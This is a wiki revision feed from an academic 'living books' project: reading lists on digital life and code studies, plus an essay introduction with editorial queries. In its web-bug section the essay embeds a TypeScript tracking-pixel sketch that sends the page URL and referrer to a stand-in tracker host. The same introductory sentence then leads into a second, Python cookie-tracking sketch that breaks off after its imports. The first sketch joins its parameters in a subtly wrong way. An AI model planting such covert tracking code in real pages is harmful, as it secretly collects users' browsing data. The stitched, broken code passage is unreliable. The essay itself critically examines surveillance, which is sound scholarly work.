;[http://quantifiedself.com Quantified Self]&lt;br /&gt;
&lt;br /&gt;
;Gary Wolf&amp;amp;nbsp; &lt;br /&gt;
:[http://xrl.us/bh3d4g The Data-Driven Life]&lt;br /&gt;
&lt;br /&gt;
;Aiden R. Doherty and Alan F. Smeaton&amp;amp;nbsp; &lt;br /&gt;
:[http://doras.dcu.ie/15300/1/Sensors-03-154-Doherty-ie-edited.pdf Automatically Augmenting Lifelog Events Using Pervasively Generated Content from Millions of People]&lt;br /&gt;
&lt;br /&gt;
;Jennifer S. Beaudin, Stephen S. Intille, and Margaret E. Morris&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC1794006/?tool=pmcentrez#ref1 To Track or Not to Track: User Reactions to Concepts in Longitudinal Health Monitoring]&lt;br /&gt;
&lt;br /&gt;
=== The Neurological Turn: or, ‘How the Internet Gets Inside Us'  ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;NhLnoZFCDBM&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Adam Gopnik&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newyorker.com/arts/critics/atlarge/2011/02/14/110214crat_atlarge_gopnik The Information: How the Internet Gets Inside Us]&lt;br /&gt;
&lt;br /&gt;
;N. Katherine Hayles&amp;amp;nbsp; &lt;br /&gt;
:[http://www.sciy.org/2010/11/24/hyper-and-deep-attention-the-generational-divide-in-cognitive-modes-by-n-katherine-hayles/ Hyper and Deep Attention: The Generational Divide in Cognitive Modes]&lt;br /&gt;
&lt;br /&gt;
;Anna Munster&amp;amp;nbsp; &lt;br /&gt;
:[http://computationalculture.net/article/nerves-of-data Nerves of Data: The Neurological Turn In/Against Networked Media]&lt;br /&gt;
&lt;br /&gt;
== '''Visualize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== What is Visualization?  ===&lt;br /&gt;
&lt;br /&gt;
;Lev Manovich&amp;amp;nbsp; &lt;br /&gt;
:[http://manovich.net/blog/wp-content/uploads/2010/10/manovich_visualization_2010.doc What is Visualization?]&lt;br /&gt;
&lt;br /&gt;
;Nathan Yau&amp;amp;nbsp; &lt;br /&gt;
:[http://flowingdata.com/2011/02/23/data-visualization-meets-game-design-to-explore-your-digital-life/ Data Visualization Meets Game Design to Explore your Digital Life]&lt;br /&gt;
&lt;br /&gt;
;[http://bloom.io/ Bloom]&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8569187}} &lt;br /&gt;
&lt;br /&gt;
;Keiichi Matsuda &lt;br /&gt;
:[http://www.keiichimatsuda.com/augmented.php Augmented (hyper)Reality: Domestic Robocop]&lt;br /&gt;
&lt;br /&gt;
=== Mood-mapping  ===&lt;br /&gt;
&lt;br /&gt;
;Celeste Biever&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newscientist.com/article/dn19200-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter Mood Maps Reveal Emotional States of America]&lt;br /&gt;
&lt;br /&gt;
;[http://www.newscientist.com/articlevideo/dn19200/221111468001-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter mood video]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ZglPWYb8X2o&amp;lt;/youtube&amp;gt; [http://www.moodscope.com/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.moodscope.com/ Moodscope]&lt;br /&gt;
&lt;br /&gt;
;[http://www.mappiness.org.uk Mappiness]&lt;br /&gt;
&lt;br /&gt;
=== The Visualized Human (or, The Human As Spectacle)  ===&lt;br /&gt;
&lt;br /&gt;
;Nicholas Felton&amp;amp;nbsp; &lt;br /&gt;
:[http://feltron.com/ The Annual Felton Report]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;RE4ce4mexrU&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Deb Roy&amp;amp;nbsp; &lt;br /&gt;
:[http://www.youtube.com/watch?v=RE4ce4mexrU&amp;amp;feature=youtu.be The Birth of a Word]&lt;br /&gt;
&lt;br /&gt;
;Johanna Drucker&amp;amp;nbsp; &lt;br /&gt;
:[http://mit.tv/y7OwFq Humanistic Approaches to the Graphical Expression of Interpretation]&lt;br /&gt;
&lt;br /&gt;
== Search Me  ==&lt;br /&gt;
&lt;br /&gt;
=== Search-Engine Science  ===&lt;br /&gt;
&lt;br /&gt;
;Emily H. Chan, Vikram Sahai, Corrie Conrad, and John S. Brownstein&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC3104029&amp;amp;tool=pmcentrez Using Web Search Query Data to Monitor Dengue Epidemics: A New Model for Neglected Tropical Disease Surveillance]&lt;br /&gt;
&lt;br /&gt;
;Annie Y.S. Lau, Enrico Coiera, Tatjana Zrimec, and Paul Compton&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC2956236&amp;amp;tool=pmcentrez Clinician Search Behaviors May Be Influenced by Search Engine Design]&lt;br /&gt;
&lt;br /&gt;
;[https://brandyourself.com/ BrandYourself]&lt;br /&gt;
&lt;br /&gt;
=== The Science of Control  ===&lt;br /&gt;
&lt;br /&gt;
;Alessio Signorini, Alberto Maria Segre, Philip M. Polgreen&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosone.org/article/info%3Adoi%2F10.1371%2Fjournal.pone.0019467 The Use of Twitter to Track Levels of Disease Activity and Public Concern in the U.S. During the Influenza A H1N1 Pandemic]&lt;br /&gt;
&lt;br /&gt;
;David Parry&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/Surveillance ''Surveillance'' ]&lt;br /&gt;
&lt;br /&gt;
;Felix Stalder and Christine Mayer&amp;amp;nbsp; &lt;br /&gt;
:[http://felix.openflows.com/node/113 The Second Index: Search Engines, Personalization and Surveillance (Deep Search)]&lt;br /&gt;
&lt;br /&gt;
=== Deep Search  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=13456992}} &lt;br /&gt;
&lt;br /&gt;
;Michael K. Bergman&amp;amp;nbsp; &lt;br /&gt;
:[http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104 The Deep Web: Surfacing Hidden Value]&lt;br /&gt;
&lt;br /&gt;
;Clare Birchall&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/The_in/visible The Invisible Web, ''The In/Visible'']&lt;br /&gt;
&lt;br /&gt;
== Media Gifts?  ==&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8223187}} [http://www.suicidemachine.org/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.suicidemachine.org/ Web 2.0 Suicide Machine]&lt;br /&gt;
&lt;br /&gt;
;[http://transparencygrenade.com/ Transparency Grenade]&lt;br /&gt;
&lt;br /&gt;
;[http://www.freedomboxfoundation.org/ Freedom Box Foundation]&lt;br /&gt;
&lt;br /&gt;
;[http://yacy.net/en/index.html/ YaCy]&lt;br /&gt;
&lt;br /&gt;
;[http://navasse.net/traceblog/about.html Traceblog]&lt;br /&gt;
&lt;br /&gt;
;[http://turbulence.org/Works/JJPS/extension The JJPS Firefox Extension]&lt;br /&gt;
&lt;br /&gt;
;[http://www.weavrs.com/find/ Weavrs]&lt;br /&gt;
&lt;br /&gt;
== Appendix  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ukNkx45Ua0Y&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Karl Popper, ''The Open Society and its Enemies''&lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Attributions Attributions]  ==&lt;br /&gt;
&lt;br /&gt;
== A 'Frozen' PDF Version of this Living Book  ==&lt;br /&gt;
&lt;br /&gt;
;[http://livingbooksaboutlife.org/pdfs/bookarchive/DigitizeMe.pdf Download a 'frozen' PDF version of this book as it appeared on 7th October 2011]&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software&amp;diff=4716</id>
		<title>Life in Code and Software</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software&amp;diff=4716"/>
		<updated>2012-04-18T17:31:46Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:LivingCodeSoftwareCover.jpg|right|318x450px|LivingCodeSoftwareCover.jpg]] Mediated life in a complex computational ecology &lt;br /&gt;
&lt;br /&gt;
[http://www.livingbooksaboutlife.org/books/ISBN_Numbers ISBN: 978-1-60785-XXX-X] ''edited by'' [http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software/bio David Berry] &lt;br /&gt;
&lt;br /&gt;
 __TOC__ &lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software/Introduction '''Introduction: What is code and software?''']  ==&lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. It does so because these technologies increasingly make up an important part of our urban environment, and indeed stretch even to very remote areas of the world. The book introduces and explores the way in which code and software become the conditions of possibility for human living, crucially becoming a computational ecology which we inhabit. As such we need to take account of this new computational world and think about how we live today in a highly mediated code-based world. Computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media forms in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which also remains within the purview of humans to seek to understand. [http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software/Introduction (more...)] &lt;br /&gt;
&lt;br /&gt;
== Thinking Software  ==&lt;br /&gt;
&lt;br /&gt;
;Eric W. Weisstein&amp;amp;nbsp;&lt;br /&gt;
:[http://mathworld.wolfram.com/TuringMachine.html What is a Turing Machine?]&lt;br /&gt;
&lt;br /&gt;
;David Barker-Plummer&amp;amp;nbsp;&lt;br /&gt;
:[http://plato.stanford.edu/entries/turing-machine/ Turing Machines]&lt;br /&gt;
&lt;br /&gt;
;Achim Jung&amp;amp;nbsp;&lt;br /&gt;
:[http://www.cs.bham.ac.uk/~axj/pub/papers/lambda-calculus.pdf A short introduction to the Lambda Calculus]&lt;br /&gt;
&lt;br /&gt;
;Luciana Parisi &amp;amp;amp; Stamatia Portanova&amp;amp;nbsp;&lt;br /&gt;
:[http://computationalculture.net/article/soft-thought Soft Thought (in architecture and choreography)]&lt;br /&gt;
&lt;br /&gt;
;David M. Berry&amp;amp;nbsp;&lt;br /&gt;
:[http://www.palgrave.com/PDFs/9780230292642.pdf Understanding Digital Humanities]&lt;br /&gt;
&lt;br /&gt;
;Edsger W. Dijkstra&amp;amp;nbsp;&lt;br /&gt;
:[http://www.u.arizona.edu/~rubinson/copyright_violations/Go_To_Considered_Harmful.html Go To Statement Considered Harmful]&lt;br /&gt;
&lt;br /&gt;
;Alan M. Turing&amp;amp;nbsp;&lt;br /&gt;
:[http://classes.soe.ucsc.edu/cmps140/Winter10/turing1950.pdf Computing machinery and intelligence]&lt;br /&gt;
&lt;br /&gt;
;Martin Gardner&amp;amp;nbsp;&lt;br /&gt;
:[http://www.ibiblio.org/lifepatterns/october1970.html The fantastic combinations of John Conway's new solitaire game 'life']&lt;br /&gt;
&lt;br /&gt;
;Alan M. Turing&amp;amp;nbsp;&lt;br /&gt;
:[http://www.cs.virginia.edu/~robins/Turing_Paper_1936.pdf On Computable Numbers, with an Application to the Entscheidungsproblem]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;E3keLeMwfHY&amp;lt;/youtube&amp;gt; ''Video of a Turing Machine - Overview'' &lt;br /&gt;
&lt;br /&gt;
;Kevin Slavin&amp;amp;nbsp;&lt;br /&gt;
:[http://www.ted.com/talks/kevin_slavin_how_algorithms_shape_our_world.html How algorithms shape our world]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;TDaFwnOiKVE&amp;lt;/youtube&amp;gt; ''Video showing how these complex computer programs determine espionage tactics, stock prices, movie scripts, and architecture.''&lt;br /&gt;
&lt;br /&gt;
== Code Literacy ('iteracy')  ==&lt;br /&gt;
&lt;br /&gt;
;David M. Berry&amp;amp;nbsp;&lt;br /&gt;
:[http://stunlaw.blogspot.com/2011/09/iteracy-reading-writing-and-running.html Iteracy: Reading, Writing and Running Code]&lt;br /&gt;
&lt;br /&gt;
;Ian Bogost&amp;amp;nbsp;&lt;br /&gt;
:[http://www.bogost.com/downloads/I.%20Bogost%20Procedural%20Literacy.pdf Procedural Literacy: Problem Solving with Programming, Systems, &amp;amp;amp; Play]&lt;br /&gt;
&lt;br /&gt;
;Cathy Davidson&amp;amp;nbsp;&lt;br /&gt;
:[http://dmlcentral.net/blog/cathy-davidson/why-we-need-4th-r-reading-writing-arithmetic-algorithms Why We Need a 4th R: Reading, wRiting, aRithmetic, algoRithms]&lt;br /&gt;
&lt;br /&gt;
;Jeannette M. Wing&amp;amp;nbsp;&lt;br /&gt;
:[http://www.cs.cmu.edu/afs/cs/usr/wing/www/publications/Wing06.pdf Computational Thinking]&lt;br /&gt;
&lt;br /&gt;
;Stephen Ramsay&amp;amp;nbsp;&lt;br /&gt;
:[http://lenz.unl.edu/papers/2011/01/11/on-building.html On Building]&lt;br /&gt;
&lt;br /&gt;
;Edsger W. Dijkstra&amp;amp;nbsp;&lt;br /&gt;
:[http://virtual.itca.edu.sv/dokeos/sinapsis/cd/doctos-sw-libre/docus-ewd/EWD1036%20-%20On%20the%20cruelty%20of%20really%20teaching%20computing%20scienc.pdf On the cruelty of really teaching computing science]&lt;br /&gt;
&lt;br /&gt;
;Louis McCallum and Davy Smith&amp;amp;nbsp;&lt;br /&gt;
:[http://vimeo.com/20241649 Show Us Your Screens]&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=20241649}} ''A short documentary about live coding practice by Louis McCallum and Davy Smith.'' &lt;br /&gt;
&lt;br /&gt;
;Jeannette M. Wing&amp;amp;nbsp;&lt;br /&gt;
:[http://www.youtube.com/C2Pq4N-iE4I Computational Thinking and Thinking About Computing]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;C2Pq4N-iE4I&amp;lt;/youtube&amp;gt; ''Wing argues that computational thinking will be a fundamental skill used by everyone in the world. To reading, writing, and arithmetic, she adds computational thinking to everyone's analytical ability.'' &lt;br /&gt;
&lt;br /&gt;
== Decoding Code  ==&lt;br /&gt;
&lt;br /&gt;
;David M. Berry&amp;amp;nbsp;&lt;br /&gt;
:[http://thirteen.fibreculturejournal.org/fcj-086-a-contribution-towards-a-grammar-of-code/ A Contribution Towards a Grammar of Code]&lt;br /&gt;
&lt;br /&gt;
;Mark C. Marino&amp;amp;nbsp;&lt;br /&gt;
:[http://www.electronicbookreview.com/thread/electropoetics/codology Critical Code Studies]&lt;br /&gt;
&lt;br /&gt;
;Lev Manovich&amp;amp;nbsp;&lt;br /&gt;
:[http://lab.softwarestudies.com/2008/11/softbook.html Software Takes Command]&lt;br /&gt;
&lt;br /&gt;
;Dennis G. Jerz&amp;amp;nbsp;&lt;br /&gt;
:[http://www.digitalhumanities.org/dhq/vol/001/2/000009/000009.html Somewhere Nearby is Colossal Cave: Examining Will Crowther's Original &amp;quot;Adventure&amp;quot; in Code and in Kentucky]&lt;br /&gt;
&lt;br /&gt;
;Aleksandr Matrosov, Eugene Rodionov, David Harley, and Juraj Malcho&amp;amp;nbsp;&lt;br /&gt;
:[http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf Stuxnet Under the Microscope]&lt;br /&gt;
&lt;br /&gt;
;Ralph Langner&amp;amp;nbsp;&lt;br /&gt;
:[http://www.youtube.com/watch?v=CS01Hmjv1pQ Cracking Stuxnet, a 21st-century cyber weapon]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;CS01Hmjv1pQ&amp;lt;/youtube&amp;gt; ''A fascinating look inside cyber-forensics and the processes of reading code to understand how it works and what it attacks.'' &lt;br /&gt;
&lt;br /&gt;
;Stephen Ramsay&amp;amp;nbsp;&lt;br /&gt;
:[http://vimeo.com/9790850 Algorithms are Thoughts, Chainsaws are Tools]&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=9790850}} ''A short film on livecoding presented as part of the Critical Code Studies Working Group, March 2010, by Stephen Ramsay. Presents a &amp;quot;live reading&amp;quot; of a performance by composer Andrew Sorensen.'' &lt;br /&gt;
&lt;br /&gt;
;Wendy Chun&amp;amp;nbsp;&lt;br /&gt;
:[http://vimeo.com/16328263 Critical Code Studies]&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=16328263}} ''Wendy Chun giving a lecture on code studies and reading source code.'' &lt;br /&gt;
&lt;br /&gt;
;Federica Frabetti&amp;amp;nbsp;&lt;br /&gt;
:[http://vimeo.com/16263212 Critical Code Studies]&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=16263212}} ''Federica Frabetti giving a lecture on code studies and reading source code.'' &lt;br /&gt;
&lt;br /&gt;
== Software Ecologies  ==&lt;br /&gt;
&lt;br /&gt;
;Gilles Deleuze&amp;amp;nbsp;&lt;br /&gt;
:[http://www.n5m.org/n5m2/media/texts/deleuze.htm Postscript on the Societies of Control]&lt;br /&gt;
&lt;br /&gt;
;Felix Guattari&amp;amp;nbsp;&lt;br /&gt;
:[http://www.amielandmelburn.org.uk/collections/newformations/08_131.pdf The Three Ecologies]&lt;br /&gt;
&lt;br /&gt;
;Robert Kitchin&amp;amp;nbsp;&lt;br /&gt;
:[http://www.envplan.com/epb/editorials/b3806com.pdf The Programmable City]&lt;br /&gt;
&lt;br /&gt;
;Bruno Latour&amp;amp;nbsp;&lt;br /&gt;
:[http://www.bruno-latour.fr/sites/default/files/123-WHOLE-PART-FINAL.pdf The Whole is Always Smaller Than Its Parts – A Digital Test of Gabriel Tarde’s Monads]&lt;br /&gt;
&lt;br /&gt;
;Matthew Fuller and Sonia Matos&amp;amp;nbsp;&lt;br /&gt;
:[http://nineteen.fibreculturejournal.org/fcj-135-feral-computing-from-ubiquitous-calculation-to-wild-interactions/ Feral Computing: From Ubiquitous Calculation to Wild Interactions]&lt;br /&gt;
&lt;br /&gt;
;Jussi Parikka&amp;amp;nbsp;&lt;br /&gt;
:[http://seventeen.fibreculturejournal.org/fcj-116-media-ecologies-and-imaginary-media-transversal-expansions-contractions-and-foldings/ Media Ecologies and Imaginary Media: Transversal Expansions, Contractions, and Foldings]&lt;br /&gt;
&lt;br /&gt;
;David Gelernter&amp;amp;nbsp;&lt;br /&gt;
:[http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html Time to start taking the Internet seriously]&lt;br /&gt;
&lt;br /&gt;
;Adrian Mackenzie&amp;amp;nbsp;&lt;br /&gt;
:[http://www.lancs.ac.uk/staff/mackenza/papers/code-leviathan.pdf The Problem of Computer Code: Leviathan or Common Power?]&lt;br /&gt;
&lt;br /&gt;
;Adrian Mackenzie&amp;amp;nbsp;&lt;br /&gt;
:[http://thirteen.fibreculturejournal.org/fcj-085-wirelessness-as-experience-of-transition/ Wirelessness as Experience of Transition]&lt;br /&gt;
&lt;br /&gt;
;Thomas Goetz&amp;amp;nbsp;&lt;br /&gt;
:[http://www.wired.com/magazine/2011/06/ff_feedbackloop/ Harnessing the Power of Feedback Loops]&lt;br /&gt;
&lt;br /&gt;
;Christian Ulrik Andersen &amp;amp;amp; Søren Pold&amp;amp;nbsp;&lt;br /&gt;
:[http://nineteen.fibreculturejournal.org/fcj-133-the-scripted-spaces-of-urban-ubiquitous-computing-the-experience-poetics-and-politics-of-public-scripted-space/ The Scripted Spaces of Urban Ubiquitous Computing: The experience, poetics, and politics of public scripted space]&lt;br /&gt;
&lt;br /&gt;
;B.J. Fogg, Gregory Cuellar, and David Danielson&amp;amp;nbsp;&lt;br /&gt;
:[http://bjfogg.com/hci.pdf Motivating, Influencing, and Persuading Users]&lt;br /&gt;
&lt;br /&gt;
;Gary Wolf&amp;amp;nbsp;&lt;br /&gt;
:[http://www.youtube.com/OrAo8oBBFIo The quantified self]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;OrAo8oBBFIo&amp;lt;/youtube&amp;gt; &lt;br /&gt;
''The notion of using computational devices in everyday life to record everything about you.''&lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software/Attributions '''Attributions'''] ==&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4715</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4715"/>
		<updated>2012-04-18T17:26:29Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?] &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it remains within the purview of humans to seek to understand. As Kitchin argues: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945) &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project, a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al'' have argued: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990, 39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012) &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software acts as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, this is in reality the condition of the computational environment we increasingly experience, one which I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post)modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacrum lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangles which yield only to certain prescribed forms of touch-based interface. Here I am thinking as much of physical keyboards and trackpads as of haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?] &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomenon of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which actively and covertly collects data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012). &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior and send various information about the user back to their servers. &lt;br /&gt;
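&lt;br /&gt;
To make this mechanism concrete, here is a minimal sketch, in TypeScript, of the kind of thing such a web bug does; the tracker endpoint, the parameter names and the fireWebBug function are hypothetical, invented purely for illustration: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
// Hypothetical sketch of a web bug: a 1x1 image whose URL carries
// data back to a tracking server when the browser fetches it.
function fireWebBug(event: string): void {
  const pixel = new Image(1, 1);  // an invisible one-pixel image
  const data = [
    'event=' + encodeURIComponent(event),
    'page=' + encodeURIComponent(location.href),
    'ref=' + encodeURIComponent(document.referrer),
  ].join(';');  // ';' keeps this sketch readable; real bugs typically chain parameters with ampersands
  // The image request itself is the data transfer; no response is needed.
  pixel.src = 'https://tracker.example.com/ping?' + data;
}

fireWebBug('pageview');
&amp;lt;/pre&amp;gt; &lt;br /&gt;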
&lt;br /&gt;
Originally introduced as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘state’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour and collect data and information about users has important privacy implications, but it also facilitates the rise of so-called behavioural marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
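&lt;br /&gt;
To make the mechanism concrete, the following sketch shows, in broad outline, how a tracking pixel ties a cookie to repeat visits. It is a minimal, hypothetical illustration written in Python for this chapter; real web bugs are served by large advertising platforms rather than scripts like this, and the names and port used here are invented: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Hypothetical sketch of a 'web bug' endpoint: a 1x1 image whose real job
# is to set and read an identifying cookie and log each request it sees.
from http.server import BaseHTTPRequestHandler, HTTPServer
import uuid

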